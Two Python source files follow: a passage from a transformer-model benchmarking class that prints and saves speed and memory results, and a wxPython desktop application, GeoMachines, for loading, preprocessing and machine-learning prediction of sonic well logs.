        train_result_memory = copy.deepcopy(result_dict)
        for c, model_name in enumerate(self.args.model_names):
            self.print_fn(f"{c + 1} / {len(self.args.model_names)}")
            model_dict = {
                "bs": self.args.batch_sizes,
                "ss": self.args.sequence_lengths,
                "result": {i: {} for i in self.args.batch_sizes},
            }
            inference_result_time[model_name] = copy.deepcopy(model_dict)
            inference_result_memory[model_name] = copy.deepcopy(model_dict)
            train_result_time[model_name] = copy.deepcopy(model_dict)
            train_result_memory[model_name] = copy.deepcopy(model_dict)
            inference_summary = train_summary = None
            for batch_size in self.args.batch_sizes:
                for sequence_length in self.args.sequence_lengths:
                    if self.args.inference:
                        if self.args.memory:
                            memory, inference_summary = self.inference_memory(model_name, batch_size, sequence_length)
                            inference_result_memory[model_name]["result"][batch_size][sequence_length] = memory
                        if self.args.speed:
                            time = self.inference_speed(model_name, batch_size, sequence_length)
                            inference_result_time[model_name]["result"][batch_size][sequence_length] = time
                    if self.args.training:
                        if self.args.memory:
                            memory, train_summary = self.train_memory(model_name, batch_size, sequence_length)
                            train_result_memory[model_name]["result"][batch_size][sequence_length] = memory
                        if self.args.speed:
                            time = self.train_speed(model_name, batch_size, sequence_length)
                            train_result_time[model_name]["result"][batch_size][sequence_length] = time
        if self.args.inference:
            if self.args.speed:
                self.print_fn("\n" + 20 * "=" + ("INFERENCE - SPEED - RESULT").center(40) + 20 * "=")
                self.print_results(inference_result_time, type_label="Time in s")
                self.save_to_csv(inference_result_time, self.args.inference_time_csv_file)
                if self.args.is_tpu:
                    self.print_fn(
                        "TPU was used for inference. Note that the time after compilation stabilized (after ~10 inferences model.forward(..) calls) was measured."
                    )
            if self.args.memory:
                self.print_fn("\n" + 20 * "=" + ("INFERENCE - MEMORY - RESULT").center(40) + 20 * "=")
                self.print_results(inference_result_memory, type_label="Memory in MB")
                self.save_to_csv(inference_result_memory, self.args.inference_memory_csv_file)
            if self.args.trace_memory_line_by_line:
                # Fix: header previously misspelled "MEMOMRY"
                self.print_fn("\n" + 20 * "=" + ("INFERENCE - MEMORY - LINE BY LINE - SUMMARY").center(40) + 20 * "=")
                self.print_memory_trace_statistics(inference_summary)
        if self.args.training:
            if self.args.speed:
                self.print_fn("\n" + 20 * "=" + ("TRAIN - SPEED - RESULTS").center(40) + 20 * "=")
                self.print_results(train_result_time, "Time in s")
                self.save_to_csv(train_result_time, self.args.train_time_csv_file)
                if self.args.is_tpu:
                    self.print_fn(
                        "TPU was used for training. Note that the time after compilation stabilized (after ~10 train loss=model.forward(...) + loss.backward() calls) was measured."
                    )
            if self.args.memory:
                self.print_fn("\n" + 20 * "=" + ("TRAIN - MEMORY - RESULTS").center(40) + 20 * "=")
                self.print_results(train_result_memory, type_label="Memory in MB")
                self.save_to_csv(train_result_memory, self.args.train_memory_csv_file)
            if self.args.trace_memory_line_by_line:
                # Fix: header previously misspelled "MEMOMRY"
                self.print_fn("\n" + 20 * "=" + ("TRAIN - MEMORY - LINE BY LINE - SUMMARY").center(40) + 20 * "=")
                self.print_memory_trace_statistics(train_summary)
        if self.args.env_print:
            self.print_fn("\n" + 20 * "=" + ("ENVIRONMENT INFORMATION").center(40) + 20 * "=")
            self.print_fn(
                "\n".join(["- {}: {}".format(prop, val) for prop, val in self.environment_info.items()]) + "\n"
            )
        if self.args.save_to_csv:
            with open(self.args.env_info_csv_file, mode="w", newline="") as csv_file:
                writer = csv.writer(csv_file)
                for key, value in self.environment_info.items():
                    writer.writerow([key, value])
        return BenchmarkOutput(
            inference_result_time,
            inference_result_memory,
            train_result_time,
            train_result_memory,
            inference_summary,
            train_summary,
        )

    @property
    def environment_info(self):
        """Dict describing the host, framework, and hardware; computed once and cached."""
        if self._environment_info is None:
            info = {}
            info["transformers_version"] = version
            info["framework"] = self.framework
            if self.framework == "PyTorch":
                info["use_torchscript"] = self.args.torchscript
            if self.framework == "TensorFlow":
                info["eager_mode"] = self.args.eager_mode
                info["use_xla"] = self.args.use_xla
            info["framework_version"] = self.framework_version
            info["python_version"] = platform.python_version()
            info["system"] = platform.system()
            info["cpu"] = platform.processor()
            info["architecture"] = platform.architecture()[0]
            info["date"] = datetime.date(datetime.now())
            info["time"] = datetime.time(datetime.now())
            info["fp16"] = self.args.fp16
            info["use_multiprocessing"] = self.args.do_multi_processing
            info["only_pretrain_model"] = self.args.only_pretrain_model
            if is_psutil_available():
                info["cpu_ram_mb"] = bytes_to_mega_bytes(psutil.virtual_memory().total)
            else:
                logger.warning(
                    "Psutil not installed, we won't log available CPU memory."
                    "Install psutil (pip install psutil) to log available CPU memory."
                )
                info["cpu_ram_mb"] = "N/A"
            info["use_gpu"] = self.args.is_gpu
            if self.args.is_gpu:
                info["num_gpus"] = 1  # TODO(PVP) Currently only single GPU is supported
                if is_py3nvml_available():
                    nvml.nvmlInit()
                    handle = nvml.nvmlDeviceGetHandleByIndex(self.args.device_idx)
                    info["gpu"] = nvml.nvmlDeviceGetName(handle)
                    info["gpu_ram_mb"] = bytes_to_mega_bytes(nvml.nvmlDeviceGetMemoryInfo(handle).total)
                    info["gpu_power_watts"] = nvml.nvmlDeviceGetPowerManagementLimit(handle) / 1000
                    info["gpu_performance_state"] = nvml.nvmlDeviceGetPerformanceState(handle)
                    nvml.nvmlShutdown()
                else:
                    logger.warning(
                        "py3nvml not installed, we won't log GPU memory usage. "
                        "Install py3nvml (pip install py3nvml) to log information about GPU."
                    )
                    info["gpu"] = "N/A"
                    info["gpu_ram_mb"] = "N/A"
                    info["gpu_power_watts"] = "N/A"
                    info["gpu_performance_state"] = "N/A"
            info["use_tpu"] = self.args.is_tpu
            # TODO(PVP): See if we can add more information about TPU
            # see: https://github.com/pytorch/xla/issues/2180
            self._environment_info = info
        return self._environment_info

    def print_results(self, result_dict, type_label):
        """Print one result table (model / batch size / seq length / value)."""
        self.print_fn(80 * "-")
        self.print_fn(
            "Model Name".center(30) + "Batch Size".center(15) + "Seq Length".center(15) + type_label.center(15)
        )
        self.print_fn(80 * "-")
        for model_name in self.args.model_names:
            for batch_size in result_dict[model_name]["bs"]:
                for sequence_length in result_dict[model_name]["ss"]:
                    result = result_dict[model_name]["result"][batch_size][sequence_length]
                    if isinstance(result, float):
                        # round to millisecond precision; flag sub-ms timings
                        result = round(1000 * result) / 1000
                        result = "< 0.001" if result == 0.0 else str(result)
                    else:
                        result = str(result)
                    self.print_fn(
                        model_name[:30].center(30) + str(batch_size).center(15),
                        str(sequence_length).center(15),
                        result.center(15),
                    )
        self.print_fn(80 * "-")

    def print_memory_trace_statistics(self, summary: MemorySummary):
        """Print the per-line memory consumption report of a `MemorySummary`."""
        self.print_fn(
            "\nLine by line memory consumption:\n"
            + "\n".join(
                f"{state.frame.filename}:{state.frame.line_number}: mem {state.cpu_gpu}: {state.frame.line_text}"
                for state in summary.sequential
            )
        )
        self.print_fn(
            "\nLines with top memory consumption:\n"
            + "\n".join(
                f"=> {state.frame.filename}:{state.frame.line_number}: mem {state.cpu_gpu}: {state.frame.line_text}"
                for state in summary.cumulative[:6]
            )
        )
        self.print_fn(
            "\nLines with lowest memory consumption:\n"
            + "\n".join(
                f"=> {state.frame.filename}:{state.frame.line_number}: mem {state.cpu_gpu}: {state.frame.line_text}"
                for state in summary.cumulative[-6:]
            )
        )
        self.print_fn(f"\nTotal memory increase: {summary.total}")

    def save_to_csv(self, result_dict, filename):
        """Write one result table to `filename` as CSV (no-op unless `args.save_to_csv`)."""
        if not self.args.save_to_csv:
            return
        self.print_fn("Saving results to csv.")
        with open(filename, mode="w") as csv_file:
            # Fix: the assertion message referenced `self.model_names`, which
            # does not exist (AttributeError on failure); use self.args.
            assert len(self.args.model_names) > 0, "At least 1 model should be defined, but got {}".format(
                self.args.model_names
            )
            fieldnames = ["model", "batch_size", "sequence_length"]
            writer = csv.DictWriter(csv_file, fieldnames=fieldnames + ["result"])
            writer.writeheader()
            for model_name in self.args.model_names:
                result_dict_model = result_dict[model_name]["result"]
                for bs in result_dict_model:
                    for ss in result_dict_model[bs]:
                        result_model = result_dict_model[bs][ss]
                        writer.writerow(
                            {
                                "model": model_name,
                                "batch_size": bs,
                                "sequence_length": ss,
                                "result": ("{}" if not isinstance(result_model, float) else "{:.4f}").format(
                                    result_model
                                ),
                            }
                        )
|
wxGeoMachines.py | #!/usr/bin/env pythonw
# -*- coding: utf-8 -*-
"""
MIT License
Copyright (c) 2019 maxvelasques
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
print('Loading python moduli...')
import sys
import os
import multiprocessing

# The start method may only be set once per interpreter; a second call raises
# RuntimeError (e.g. when this module is re-imported by a spawned child).
try:
    print('Setting multiprocessing method to spawn...', end=" ")
    multiprocessing.set_start_method('spawn')
    print('Done')
except RuntimeError:
    print('Spawn multiprocessing method has already been set.')

# Import third-party dependencies one group at a time so the user gets a
# precise message about which package is missing. The original bare `except:`
# clauses are narrowed to `except ImportError:` so real errors
# (KeyboardInterrupt, SystemExit, bugs inside a dependency) are not swallowed.
try:
    from matplotlib import cm
    from matplotlib import colorbar
    from matplotlib import colors
    from matplotlib import figure
    from matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigureCanvas
    from matplotlib.backends.backend_wxagg import NavigationToolbar2WxAgg as NavigationToolbar
    import matplotlib.pyplot as plt
except ImportError:
    print('matplotlib not available.')
    exit(0)
try:
    import numpy as np
except ImportError:
    print('numpy not available.')
    exit(0)
try:
    import pandas as pd
except ImportError:
    print('pandas not available.')
    exit(0)
try:
    import scipy.optimize as optimize
    import scipy.signal as signal
except ImportError:
    print('scipy not available.')
    exit(0)
try:
    import csv
except ImportError:
    print('csv not available.')
    exit(0)
try:
    import lasio
except ImportError:
    print('lasio not available.')
    exit(0)
try:
    from sklearn import cluster
    from sklearn.preprocessing import StandardScaler
except ImportError:
    # sklearn is optional: only needed for log generation, so do not exit
    print('Sklearn not available. Install sklearn before generating logs')
try:
    import wx
    import wx.lib.agw.aui as aui
    import wx.lib.mixins.inspection as wit
    import wx.adv
except ImportError:
    print('wxPython not available.')
    exit(0)
from mutil import ReadLAS
from mutil import ReadASC
from mutil import WriteLAS
from mutil import ReadCoords
from mutil import emptyplotLog
from mutil import plotLogs
from mutil import PrepareStringStatus
from mutil import PrepareStringError
from mutil import concatenate_pandas
from mutil import split_pandas
from mutil import dicts_are_equal
from mutil import ffnn_predict
from mutil import random_forest_predict
from mutil import gardner_predict
from mCrossPlot import CrossPlotFrame
from mBaseMap import BaseMapFrame
##############################################################################
# DRAW MAIN WINDOW;
##############################################################################
class mainFrame(wx.Frame):
    """Top-level GeoMachines window.

    Builds the menu bar and a splitter with the control bar (left) and the
    tabbed plot area (right), and holds every loaded well log plus all
    derived versions of it (pre-processed, FFNN / Random Forest / Gardner
    predictions), each keyed by the well-log file name shown on its tab.
    """
    def __init__(self, *args, **kwargs):
        super(mainFrame, self).__init__(*args, **kwargs)
        self.InitUI()
        # All dicts below are keyed by the well-log file name (tab title).
        self.welllogs = {}                        # raw logs as imported
        self.welllogs_pre = {}                    # pre-processed logs
        self.welllogs_ffnn = {}                   # FFNN-predicted logs
        self.welllogs_ffnn_error = {}             # FFNN prediction errors
        self.welllogs_random_forest = {}          # Random Forest predictions
        self.welllogs_random_forest_error = {}    # Random Forest errors
        self.welllogs_gardner = {}                # Gardner empirical predictions
        self.welllogs_gardner_error = {}          # Gardner errors
        self.preprocessing_pars = {}              # pre-processing parameters per well
    def InitUI(self):
        """Create the menus and the splitter layout; show an empty placeholder plot."""
        # Setting up the menu.
        datamenu = wx.Menu()
        self.Bind(wx.EVT_MENU, self.OnImport, datamenu.Append(101, "Import well", "Import"))
        self.Bind(wx.EVT_MENU, self.OnBaseMap, datamenu.Append(102, "Generate Base Map", "Base Map"))
        self.Bind(wx.EVT_MENU, self.OnExport, datamenu.Append(103, "Export well", "Export"))
        self.Bind(wx.EVT_MENU, self.OnAbout, datamenu.Append(wx.ID_ABOUT, "About GeoMachines", "About"))
        # datamenu.Append(wx.ID_ABOUT, "About","About")
        datamenu.Append(wx.ID_EXIT,"Exit","Close")
        preprosmenu = wx.Menu()
        self.Bind(wx.EVT_MENU, self.OnExportFlow,preprosmenu.Append(201, "Export workflow", "Export workflow"))
        self.Bind(wx.EVT_MENU, self.OnImportFlow,preprosmenu.Append(202, "Import and Apply workflow", "Import and Apply workflow"))
        # Creating the menubar.
        menuBar = wx.MenuBar()
        menuBar.Append(datamenu, "Data")
        menuBar.Append(preprosmenu,"Pre-Processing")
        self.SetMenuBar(menuBar)  # Adding the MenuBar to the Frame content.
        self.SetTitle('GeoMachines')
        self.Centre()
        #CREATE A SPLITTER
        splitter = wx.SplitterWindow(self)
        self.BasicControls = BasicControls(splitter,self) ##LEFT SIDE
        self.plotter = PlotNotebook(splitter) #RIGHT SIDE
        splitter.SplitVertically(self.BasicControls, self.plotter)
        splitter.SetMinimumPaneSize(200)
        splitter.SetSashPosition(200)
        # Placeholder tab named 'empty' until the first well is imported
        # (PlotNotebook.add removes it when a real well is added).
        fig,axes = self.plotter.add('empty')
        emptyplotLog(fig,axes)
    def OnAbout(self, event):
        """Show the standard wx About dialog with project credits."""
        aboutInfo = wx.adv.AboutDialogInfo()
        aboutInfo.SetName("GeoMachines")
        aboutInfo.SetVersion("1.0")
        aboutInfo.SetDescription("""
Final project of CSCI-470 Machine Learning course at Colorado School
of Mines. Developed by GeoMachines group, this application is
capable of generating sonic logs using Machine Learning methods.
""")
        aboutInfo.SetCopyright("(C) 2019-2019")
        aboutInfo.SetWebSite("https://github.com/maxvelasques/wxGeoMachines")
        aboutInfo.AddDeveloper("Max Velasques\nAndrea Damasceno\nAtilas Silva\nSamuel Chambers\nMeng Jia")
        wx.adv.AboutBox(aboutInfo)
        return
    def OnImport(self, e):
        """Let the user pick one or more .LAS/.ASC files; load each into
        self.welllogs and open a plot tab for it."""
        dialog = wx.FileDialog(self,message="Select well logs",wildcard="LAS files (*.LAS; *.ASC)|*.las;*.LAS;*.asc;*.ASC",style=wx.FD_OPEN | wx.FD_MULTIPLE)
        if dialog.ShowModal() == wx.ID_CANCEL:
            return 0;
        progressdialog = wx.ProgressDialog('Progress dialog', message='Loading data...')
        filenames = dialog.GetFilenames()
        directory = dialog.GetDirectory()
        n_itens = len(filenames)
        i=1
        for filename in filenames:
            progressdialog.Update(int(100*i/n_itens))
            i+=1
            fullpath = os.path.join(directory,filename)
            # NOTE(review): extension match is case-sensitive; a file named
            # *.las (lowercase) passes the dialog filter but is skipped here.
            if os.path.splitext(filename)[1] == '.LAS':
                print('\nReading LAS: "' + filename + '" ...')
                welllog = ReadLAS(fullpath)
                self.welllogs[filename] = welllog
                # self.welllogs_pre[filename] = welllog.copy()
                print(welllog.columns)
                fig,axes = self.plotter.add(filename)
                fig.gca()
                plotLogs(filename,fig,axes ,welllog)
            elif os.path.splitext(filename)[1] == '.ASC':
                print('\nReading ASC: "' + filename + '" ...')
                welllog = ReadASC(fullpath)
                self.welllogs[filename] = welllog
                # self.welllogs_pre[filename] = welllog.copy()
                print(welllog.columns)
                fig,axes = self.plotter.add(filename)
                fig.gca()
                plotLogs(filename,fig,axes ,welllog)
        progressdialog.Close()
    def OnExport(self, e):
        """Export the currently selected well (pre-processed version if one
        exists, with the FFNN DT column substituted in when available) to a
        LAS file chosen by the user."""
        original_filename = self.plotter.nb.GetPageText(self.plotter.nb.GetSelection())
        if original_filename == 'empty':
            return wx.MessageBox('No file available.', "Warning", wx.OK | wx.ICON_WARNING)
        with wx.FileDialog(self,message="Save current well log",wildcard="LAS files (*.LAS)|*.LAS",style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT) as dialog:
            if dialog.ShowModal() != wx.ID_CANCEL:
                fullpath = dialog.GetPath()
                if os.path.exists(fullpath):
                    print('Deleting "' + fullpath + '"...')
                    os.remove(fullpath)
                # Prefer the pre-processed log when one exists for this well.
                if original_filename in self.welllogs_pre:
                    well_log = self.welllogs_pre[original_filename]
                else:
                    well_log = self.welllogs[original_filename]
                well_log = well_log.copy()
                # Overwrite the sonic (DT) column with the FFNN prediction if present.
                if original_filename in self.welllogs_ffnn:
                    well_log_ffnn = self.welllogs_ffnn[original_filename]
                    well_log['DT'] = well_log_ffnn['DT']
                WriteLAS(fullpath,well_log)
                # well_log.to_csv(fullpath + ".csv")
                return wx.MessageBox('LAS file exported successfully.', "Export LAS file", wx.OK | wx.ICON_INFORMATION)
    def OnBaseMap(self, e):
        """Read well coordinates from a spreadsheet, keep only wells that are
        currently open as tabs, and show them in a BaseMapFrame."""
        dialog = wx.FileDialog(self,message="Select well coordinates",wildcard="XLSX files (*.XLS*)|*.xlsx;*.xls;*.XLSX;*.XLS",style=wx.FD_OPEN)
        if dialog.ShowModal() == wx.ID_CANCEL:
            return 0;
        coords_in = ReadCoords(dialog.GetPath())
        columns_names = list(coords_in.columns)
        coords_out = pd.DataFrame(columns=columns_names)
        for j in range(self.plotter.nb.GetPageCount()):
            filename = self.plotter.nb.GetPageText(j)
            if filename in coords_in.Filename.values:
                # NOTE(review): DataFrame.append was removed in pandas 2.0;
                # pd.concat would be required on modern pandas — verify the
                # pinned pandas version before upgrading.
                coords_out = coords_out.append(coords_in[coords_in.Filename == filename])
        frame = BaseMapFrame(self,coords_out,self.welllogs)
        frame.Show()
    def OnCrossPlot(self, e):
        """Open a CrossPlotFrame for the data set selected in the QC panel
        (current/all wells, original/pre-processed)."""
        dialog = wx.ProgressDialog('Progress dialog', message='Generating cross plot...')
        filename = self.plotter.nb.GetPageText(self.plotter.nb.GetSelection())
        title = self.BasicControls.QCPanel.choice.GetString(self.BasicControls.QCPanel.choice.GetCurrentSelection())
        # NOTE(review): if none of the branches matches, `frame` below is
        # unbound and frame.Show() would raise — the four choices listed in
        # QCPanel cover every selectable value, so this only matters if the
        # choice list changes.
        if title == 'Current well - Original':
            frame = CrossPlotFrame(self,title,filename,self.welllogs, dialog, alllogs = False)
        elif title == 'Current well - Pre-processed':
            frame = CrossPlotFrame(self,title,filename,self.welllogs_pre, dialog, alllogs = False)
        elif title == 'All wells - Original':
            frame = CrossPlotFrame(self,title,filename,self.welllogs, dialog, alllogs = True)
        elif title == 'All wells - Pre-processed':
            frame = CrossPlotFrame(self,title,filename,self.welllogs_pre,dialog, alllogs = True)
        dialog.Close()
        frame.Show()
    def PreProcess(self,filename, welllogs, current_preprocessing_pars,progressdialog,alllogs=False):
        """Apply the configured pre-processing steps (top cut, median
        despiking, DBSCAN outlier removal) and return the updated dict.

        Args:
            filename: well to process when alllogs is False.
            welllogs: dict of well-log DataFrames; entries are replaced in place.
            current_preprocessing_pars: dict with *_check flags and parameters.
            progressdialog: wx.ProgressDialog advanced as work proceeds.
            alllogs: process every well (and run DBSCAN on the merged set)
                instead of just *filename*.
        """
        filter_size = current_preprocessing_pars['filter_size']
        cut = current_preprocessing_pars['cut']
        if alllogs:
            n_itens = len(welllogs.keys())
            i = 1
            for key in welllogs.keys():
                progressdialog.Update(10+int(30*i/n_itens))
                i+=1
                well_tmp = welllogs[key].copy()
                #CUT THE BEGINING OF THE CURRENT WELLLOG
                if current_preprocessing_pars['cut_check']:
                    print(' Cutting log...')
                    mindepth = well_tmp.DEPT.min()
                    well_tmp = well_tmp[ well_tmp.DEPT > (mindepth + cut) ]
                #DESPIKE
                if current_preprocessing_pars['filter_check']:
                    print(' Despiking log...')
                    well_tmp.GR = signal.medfilt(well_tmp['GR'].values,filter_size)
                    well_tmp.RHOB = signal.medfilt(well_tmp['RHOB'].values,filter_size)
                    well_tmp.NPHI = signal.medfilt(well_tmp['NPHI'].values,filter_size)
                    well_tmp.DT = signal.medfilt(well_tmp['DT'].values,filter_size)
                    well_tmp.RESI = signal.medfilt(well_tmp['RESI'].values,filter_size)
                welllogs[key] = well_tmp
            #DBSCAN
            progressdialog.Update(50)
            print('All wells')
            if current_preprocessing_pars['dbscan_check']:
                print(' Applying DBSCAN...')
                ##############################################################
                # Cluster on standardized (RHOB, DT) across ALL wells merged;
                # DBSCAN labels noise points as -1, which are mapped to NaN
                # and dropped before splitting back into per-well frames.
                merged_welllogs = concatenate_pandas(welllogs)
                rhob_dt_scaled = StandardScaler().fit_transform(merged_welllogs[['RHOB','DT']].values)
                progressdialog.Update(60)
                XX = cluster.DBSCAN(eps=current_preprocessing_pars['dbscan_eps'], min_samples=current_preprocessing_pars['dbscan_minneigh']).fit(rhob_dt_scaled)
                y_pred = XX.labels_
                y_pred = y_pred.astype(float)
                y_pred[y_pred == (-1)] = np.nan
                merged_welllogs['outliers'] = y_pred
                merged_welllogs = merged_welllogs.dropna()
                merged_welllogs = merged_welllogs.drop(columns=['outliers'])
                welllogs = split_pandas(merged_welllogs)
                ##############################################################
        else:
            progressdialog.Update(30)
            well_tmp = welllogs[filename].copy()
            #CUT THE BEGINING OF THE CURRENT WELLLOG
            print(filename)
            if current_preprocessing_pars['cut_check']:
                print(' Cutting log...')
                mindepth = well_tmp.DEPT.min()
                well_tmp = well_tmp[ well_tmp.DEPT > (mindepth + cut) ]
            progressdialog.Update(50)
            #DESPIKE
            if current_preprocessing_pars['filter_check']:
                print(' Despiking log...')
                well_tmp.GR = signal.medfilt(well_tmp.GR.values,filter_size)
                well_tmp.RHOB = signal.medfilt(well_tmp.RHOB.values,filter_size)
                well_tmp.NPHI = signal.medfilt(well_tmp.NPHI.values,filter_size)
                well_tmp.DT = signal.medfilt(well_tmp.DT.values,filter_size)
                well_tmp.RESI = signal.medfilt(well_tmp.RESI.values,filter_size)
            progressdialog.Update(80)
            #DBSCAN
            if current_preprocessing_pars['dbscan_check']:
                print(' Applying DBSCAN...')
                ##############################################################
                # Same noise-removal scheme as above, but on this well only.
                rhob_dt_scaled = StandardScaler().fit_transform(well_tmp[['RHOB','DT']].values)
                XX = cluster.DBSCAN(eps=current_preprocessing_pars['dbscan_eps'], min_samples=current_preprocessing_pars['dbscan_minneigh']).fit(rhob_dt_scaled)
                y_pred = XX.labels_
                y_pred = y_pred.astype(float)
                #y_pred[y_pred != (-1)] = (0)
                y_pred[y_pred == (-1)] = np.nan
                well_tmp['outliers'] = y_pred
                well_tmp = well_tmp.dropna()
                ##############################################################
            welllogs[filename] = well_tmp
        return welllogs
    def OnPrePross(self, e):
        """Collect pre-processing parameters from the PreProsPanel widgets,
        run PreProcess on the current well or all wells, and redraw the
        affected plot tabs."""
        dialog = wx.ProgressDialog('Progress dialog', message='Processing data...')
        filename = self.plotter.nb.GetPageText(self.plotter.nb.GetSelection())
        title = self.BasicControls.PreProsPanel.choice.GetString(self.BasicControls.PreProsPanel.choice.GetCurrentSelection())
        cut_check = int(self.BasicControls.PreProsPanel.checkbox_cut.IsChecked())
        cut = self.BasicControls.PreProsPanel.spinctrl_cut.GetValue()
        dbscan_check = int(self.BasicControls.PreProsPanel.checkbox_dbscan.IsChecked())
        dbscan_eps = self.BasicControls.PreProsPanel.spinctrl_eps.GetValue()
        dbscan_minneigh = self.BasicControls.PreProsPanel.spinctrl_minneigh.GetValue()
        filter_check = int(self.BasicControls.PreProsPanel.checkbox_median.IsChecked())
        filter_size = self.BasicControls.PreProsPanel.spinctrl_median.GetValue()
        # signal.medfilt requires an odd kernel size.
        if filter_size%2 == 0:
            filter_size+=1
        current_preprocessing_pars = {'cut_check': cut_check,
                                      'cut':cut,
                                      'dbscan_check':dbscan_check,
                                      'dbscan_eps':dbscan_eps,
                                      'dbscan_minneigh':dbscan_minneigh,
                                      'filter_check':filter_check,
                                      'filter_size':filter_size
                                      }
        preparamstr = PrepareStringStatus(current_preprocessing_pars)
        last_selection = self.plotter.nb.GetSelection()
        dialog.Update(10)
        if title == 'Current well - Original':
            self.welllogs_pre[filename] = self.welllogs[filename]
            self.preprocessing_pars[filename] = current_preprocessing_pars
            self.welllogs_pre = self.PreProcess(filename, self.welllogs_pre.copy(), self.preprocessing_pars[filename],dialog,alllogs=False)
            fig,axes = self.plotter.update(filename,self.plotter.nb.GetSelection())
            fig.gca()
            plotLogs(filename,fig,axes ,self.welllogs[filename],self.welllogs_pre[filename],paramstr=preparamstr)
            self.plotter.RefreshPlot(self.plotter.nb.GetSelection())
        elif title == 'All wells - Original':
            self.welllogs_pre = self.PreProcess(filename, self.welllogs.copy(), current_preprocessing_pars,dialog,alllogs=True)
            n_pages = self.plotter.nb.GetPageCount()
            filenames = []
            for i in range(n_pages):
                filenames.append(self.plotter.nb.GetPageText(i))
            dialog.Update(60)
            j = 1
            # Redraw every tab (reversed page order) with the new results.
            for i in reversed(range(n_pages)):
                dialog.Update(60+int(30*j/n_pages))
                j+=1
                filename = filenames[i]
                fig,axes = self.plotter.update(filename,i)
                fig.gca()
                plotLogs(filename,fig,axes ,self.welllogs[filename],self.welllogs_pre[filename],paramstr=preparamstr)
                self.plotter.RefreshPlot(i)
                self.preprocessing_pars[filename] = current_preprocessing_pars
            self.plotter.nb.SetSelection(last_selection)
        dialog.Update(100)
        dialog.Close()
    def OnImportFlow(self, e):
        """Import a .flow CSV (one row per well: filename followed by
        alternating key/value pairs), rebuild per-well pre-processing
        parameters and re-apply them; if all wells share identical
        parameters, run a single all-wells pass instead."""
        dialog = wx.FileDialog(self,message="Import workflow",wildcard="Flow files (*.flow)|*.flow",style=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST)
        if dialog.ShowModal() != wx.ID_CANCEL:
            progressdialog = wx.ProgressDialog('Progress dialog', message='Processing data...')
            fullpath = dialog.GetPath()
            # NOTE(review): this file handle is never explicitly closed.
            readCSV = csv.reader(open(fullpath, "r"))
            for row in readCSV:
                filename = row[0]
                row.remove(filename)
                current_preprocessing_pars = {}
                # Remaining cells alternate key, value; values are ints when
                # possible, floats otherwise (e.g. dbscan_eps).
                for key, value in zip(row[::2],row[1::2]):
                    try:
                        current_preprocessing_pars[key] = int(value)
                    except ValueError:
                        current_preprocessing_pars[key] = float(value)
                n_pages = self.plotter.nb.GetPageCount()
                filenames = []
                for j in range(n_pages):
                    filenames.append(self.plotter.nb.GetPageText(j))
                # Only take the row if the well is currently open as a tab.
                for j in range(n_pages):
                    if filename == filenames[j]:
                        self.welllogs_pre[filename] = self.welllogs[filename]
                        self.preprocessing_pars[filename] = current_preprocessing_pars
                        break
            # Decide whether every well shares the same parameter set.
            j = 0
            alllogs = True
            filename = ''
            for key in self.preprocessing_pars.keys():
                if j == 0:
                    reference_par = self.preprocessing_pars[key]
                    filename = key
                    j+=1
                else:
                    if dicts_are_equal(reference_par,self.preprocessing_pars[key]) == False:
                        alllogs = False
                        break
            if alllogs:
                self.welllogs_pre = self.PreProcess(filename, self.welllogs_pre.copy(), self.preprocessing_pars[filename],progressdialog,alllogs=True)
            for j in range(n_pages):
                filename = self.plotter.nb.GetPageText(j)
                preparamstr = PrepareStringStatus(self.preprocessing_pars[filename])
                #UPDATE
                if alllogs == False:
                    self.welllogs_pre = self.PreProcess(filename, self.welllogs_pre.copy(), self.preprocessing_pars[filename],progressdialog,alllogs=False)
                fig,axes = self.plotter.update(filename,j)
                fig.gca()
                plotLogs(filename,fig,axes ,self.welllogs[filename],self.welllogs_pre[filename],paramstr=preparamstr)
                self.plotter.RefreshPlot(j)
            progressdialog.Update(100)
            progressdialog.Close()
        # return wx.MessageBox('Pre-processing workflow imported successfully.', "Import workflow", wx.OK | wx.ICON_INFORMATION)
    def OnExportFlow(self, e):
        """Export self.preprocessing_pars to a .flow CSV: one row per well,
        the filename followed by flattened key/value pairs."""
        dialog = wx.FileDialog(self,message="Export workflow",wildcard="Flow files (*.flow)|*.flow",style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)
        if dialog.ShowModal() != wx.ID_CANCEL:
            fullpath = dialog.GetPath()
            # NOTE(review): this file handle is never explicitly closed.
            w = csv.writer(open(fullpath, "w"))
            for key, vals in self.preprocessing_pars.items():
                row = []
                row.append(key)
                for subkey,subval in vals.items():
                    row.append(subkey)
                    row.append(subval)
                w.writerow(row)
            return wx.MessageBox('Pre-processing workflow exported successfully.', "Export workflow", wx.OK | wx.ICON_INFORMATION)
    def OnPredictLog(self, e):
        """Predict the sonic (DT) log for the current well with the model
        chosen in the ML panel (FFNN in a subprocess, Random Forest, or the
        empirical Gardner relation), cache the result, and redraw the tab."""
        filename = self.plotter.nb.GetPageText(self.plotter.nb.GetSelection())
        if filename in self.welllogs:
            progressdialog = wx.ProgressDialog('Progress dialog', message='Predicting sonic log...')
            progressdialog.Update(20)
            title = self.BasicControls.MLPanel.choicewells.GetString(self.BasicControls.MLPanel.choicewells.GetCurrentSelection())
            model_name = self.BasicControls.MLPanel.choicemodel.GetString(self.BasicControls.MLPanel.choicemodel.GetCurrentSelection())
            welllog_orig = self.welllogs[filename]
            welllog_pre = None
            welllog_ffnn = None
            welllog_ffnn_error = 0.0
            welllog_random_forest = None
            welllog_random_forest_error = 0.0
            welllog_gardner = None
            welllog_gardner_error = 0.0
            preparamstr = ""
            errorstr = ""
            preprocessed = False
